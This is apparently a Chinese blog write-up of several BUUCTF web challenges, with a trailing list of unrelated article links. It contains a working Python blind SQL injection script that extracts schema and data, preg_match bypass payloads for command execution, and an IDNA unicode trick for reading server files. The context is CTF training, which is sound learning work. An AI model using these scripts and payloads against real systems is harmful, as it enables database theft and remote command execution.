buuctf.web 64-96

1、[WUSTCTF2020]颜值成绩查询

考点:sql注入-盲注

题解:

(1)输入1-4都是有回显的;但是到5的时候就没有了;说明就是布尔盲注;采用异或盲注
参考链接

python 复制代码
import time
import requests
Success_message = "Hi"
def database_name():
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name


def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (
                col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print(("%s表的%s字段数据: " + data) % (tab_name, col_name))


if __name__ == '__main__':
    url = input("请输入url:")
    database_name()
    table_name()

2、[FBCTF2019]RCEService

考点:RCE---preg_math函数绕过

题解:

(1)提示以json格式输入;输入

py 复制代码
{"cmd":"ls"}

回显出index.php;说明服务器使用php写的;输入其他命令发现进行了过滤,说明用到了正则表达式preg_match函数。绕过preg_match函数有两种方法

(2)方法1 :利用preg_match函数的最大回溯次数可以绕过preg_match函数。 PCRE回溯次数绕过

查询英文PHP手册,发现php.ini中的pcre.backtrack_limit控制PCRE的回溯限制默认为1000000,python脚本

python 复制代码
import requests
payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://78850bfd-7aa8-4e32-bfab-181f587057c5.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)

(2)利用preg_match函数只匹配第一行,所以可以利用换行符%0A来构造payload。

py 复制代码
/?cmd={%0A"cmd": "ls /home"%0A}
/?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}

3、[SUCTF 2019]Pythonginx

考点:unicode转IDNA域名分割漏洞

题解:

(1)题目源码

python 复制代码
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

(1)就是如何绕过IDN转换

绕过检测方法1:

在unicode中有一种字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此url时,dns服务器会自动将url重定向到另一个网站

py 复制代码
?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.c℆sr/fffffflag

方法2:找一些其他的unicode符号经过punycode 转为 c 的字符;

python 复制代码
from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass


def getUrl(url):
    url = url
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False

if __name__=="__main__":
    get_unicode()

4、[0CTF 2016]piapiapia

考点:反序列化字符串逃逸

题解:参考链接

陆续更新中!!!!

相关推荐
Senar5 小时前
如何判断浏览器是否开启硬件加速
前端·javascript·数据可视化
HtwHUAT6 小时前
实验四 Java图形界面与事件处理
开发语言·前端·python
利刃之灵6 小时前
01-初识前端
前端
codingandsleeping6 小时前
一个简易版无缝轮播图的实现思路
前端·javascript·css
天天扭码6 小时前
一分钟解决 | 高频面试算法题——最大子数组之和
前端·算法·面试
全宝6 小时前
🌏【cesium系列】01.vue3+vite集成Cesium
前端·gis·cesium
拉不动的猪7 小时前
简单回顾下插槽透传
前端·javascript·面试
烛阴7 小时前
Fragment Shader--一行代码让屏幕瞬间变黄
前端·webgl
爱吃鱼的锅包肉7 小时前
Flutter路由模块化管理方案
前端·javascript·flutter
风清扬雨8 小时前
Vue3具名插槽用法全解——从零到一的详细指南
前端·javascript·vue.js